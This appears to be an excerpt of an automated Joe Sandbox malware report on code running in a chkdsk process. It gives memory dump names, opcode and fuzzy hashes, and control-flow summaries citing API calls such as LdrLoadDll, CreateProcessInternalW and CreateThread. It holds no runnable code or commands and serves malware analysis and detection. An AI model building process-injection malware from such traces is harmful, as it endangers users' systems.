                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                          • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                          • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                          • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                          • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (basic blocks and edges)
                                          • Blocks: 298 a9030-a905f; 299 a906b-a9072; 300 a9066 call abe60; 301 a9078-a90c8 call abf30 call 9a140 call a5aa0; 302 a914c-a9152; 309 a90d0-a90e1 Sleep; 310 a90e3-a90e9; 311 a9146-a914a; 312 a90eb-a9111 call a8c60; 313 a9113-a9133; 315 a9139-a913c; 316 a9134 call a8e60
                                          • Edges: 298->299, 298->300, 299->301, 299->302, 300->299, 301->309, 309->310, 309->311, 310->312, 310->313, 311->302, 311->309, 312->315, 313->315, 313->316, 315->311, 316->315
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 000A90D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 65abd6905f0a6074de93a76dc4fc1a183c9c81f992fa436b8981f6c79ac22bdb
                                          • Instruction ID: fb4008a0d6f50c086933b7b200a8f882fdb7408527c75eccbe65bab7abfe4472
                                          • Opcode Fuzzy Hash: 65abd6905f0a6074de93a76dc4fc1a183c9c81f992fa436b8981f6c79ac22bdb
                                          • Instruction Fuzzy Hash: C3316EB2602605ABD721DFA4C8A1FA7B7F8AF89700F10811DF61A5B242D770B545CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (basic blocks and edges)
                                          • Blocks: 318 a9029-a9072 call abe60; 321 a9078-a90c8 call abf30 call 9a140 call a5aa0; 322 a914c-a9152; 329 a90d0-a90e1 Sleep; 330 a90e3-a90e9; 331 a9146-a914a; 332 a90eb-a9111 call a8c60; 333 a9113-a9133; 335 a9139-a913c; 336 a9134 call a8e60
                                          • Edges: 318->321, 318->322, 321->329, 329->330, 329->331, 330->332, 330->333, 331->322, 331->329, 332->335, 333->335, 333->336, 335->331, 336->335
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 000A90D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 3c0df432608fc6fe9f1275814f97c95b21b706d27a0d5be1d80734afebe50bcb
                                          • Instruction ID: af507350fc16d4c981d656046ea1b24eb9821138d7a5e52d559d44f6dc54870c
                                          • Opcode Fuzzy Hash: 3c0df432608fc6fe9f1275814f97c95b21b706d27a0d5be1d80734afebe50bcb
                                          • Instruction Fuzzy Hash: D1217EB1A01705ABD711DFA4C8E5FABB7F4AF99700F108129F6199B242D770A855CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (basic blocks and edges)
                                          • Blocks: 338 97679-976ca call abf80 call acb60 call 9a140 call a5aa0; 347 976cc-976de PostThreadMessageW; 348 976fe-97702; 349 976fd; 350 976e0-976fb call 998a0 PostThreadMessageW
                                          • Edges: 338->347, 338->348, 347->349, 347->350, 349->348, 350->349
                                          APIs
                                          • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 000976DA
                                          • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 000976FB
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 09a693ab53f5b77bfa46604cbe96ab275ae47f1b3c9725a3eef587ad564fd1d8
                                          • Instruction ID: 9c2c899b0050746a3ad00cce5bd97d4c7e26555bae171f51c93a3c1a4d0d86fb
                                          • Opcode Fuzzy Hash: 09a693ab53f5b77bfa46604cbe96ab275ae47f1b3c9725a3eef587ad564fd1d8
                                          • Instruction Fuzzy Hash: 5A01D832A502187AEB2096D59C43FFE7B5C9F46F51F040119FF04BA1C2EB95690647F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (basic blocks and edges)
                                          • Blocks: 353 97680-9768f; 354 97698-976ca call acb60 call 9a140 call a5aa0; 355 97693 call abf80; 362 976cc-976de PostThreadMessageW; 363 976fe-97702; 364 976fd; 365 976e0-976fb call 998a0 PostThreadMessageW
                                          • Edges: 353->354, 353->355, 354->362, 354->363, 355->354, 362->364, 362->365, 364->363, 365->364
                                          APIs
                                          • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 000976DA
                                          • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 000976FB
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 25af1c734532a81ca7ba9eb524d0be4fa31931f0d13e5fbae633e88c13e8d855
                                          • Instruction ID: 415cbd060aee58b8ae5418c18163d6f9c606613e95f24094997dd1c4de9f1568
                                          • Opcode Fuzzy Hash: 25af1c734532a81ca7ba9eb524d0be4fa31931f0d13e5fbae633e88c13e8d855
                                          • Instruction Fuzzy Hash: 9D018431A902287BEB20A6959C43FFE776CAB45F51F040119FB04BA1C2EA94790547EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (basic blocks and edges)
                                          • Blocks: 563 9a140-9a169 call acdb0; 566 9a16b-9a16e; 567 9a16f-9a17d call ad1d0; 570 9a18d-9a19e call ab500; 571 9a17f-9a18a call ad450; 576 9a1a0-9a1b4 LdrLoadDll; 577 9a1b7-9a1ba
                                          • Edges: 563->566, 563->567, 567->570, 567->571, 570->576, 570->577, 571->570, 576->577
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0009A1B2
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                          • Instruction ID: e51e4d53f956fdb18039a5006dafda3ad46de06f15cbc678322b0709c60b5c48
                                          • Opcode Fuzzy Hash: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                          • Instruction Fuzzy Hash: 99011EB5E0020DBBDF10EAE4DC42FDEB7B89B55308F0041A5A90997242F631EB14CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (basic blocks and edges)
                                          • Blocks: 581 aa690-aa6e8 call aaf60 CreateProcessInternalW
                                          • Edges: none (single block)
                                          APIs
                                          • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 000AA6E4
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                          • Instruction ID: 6283380da79a0daf5a495f1b4e8488a8b1960ee1a890cde8fe80900c81105c3e
                                          • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                          • Instruction Fuzzy Hash: 6F01B2B2210108BFCB58DF89DC80EEB77ADAF8C754F118258BA0D97241C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (basic blocks and edges)
                                          • Blocks: 595 a9160-a917b; 596 a9181-a9188; 597 a917c call a5aa0; 598 a918a-a91a6 call af38f CreateThread; 599 a91a7-a91ac
                                          • Edges: 595->596, 595->597, 596->598, 596->599, 597->596
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009D2F0,?,?), ref: 000A919C
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 08617f2e8f43ed77d74b6e8f872d51ba921ece6b37278981498b09bb97806d21
                                          • Instruction ID: 245ec516c3927d5344b41231f4749b1fff86454f16e7b98f50486bb3814c1656
                                          • Opcode Fuzzy Hash: 08617f2e8f43ed77d74b6e8f872d51ba921ece6b37278981498b09bb97806d21
                                          • Instruction Fuzzy Hash: BEE06D333813043BE32061E99C02FE7B38C9B85B61F54002AFA0DEA2C2D595F90142A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009D2F0,?,?), ref: 000A919C
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: af69aab4bbfafe00aeeeb6c8681bc726d575944d437e7311a27a0ea2e220cc3b
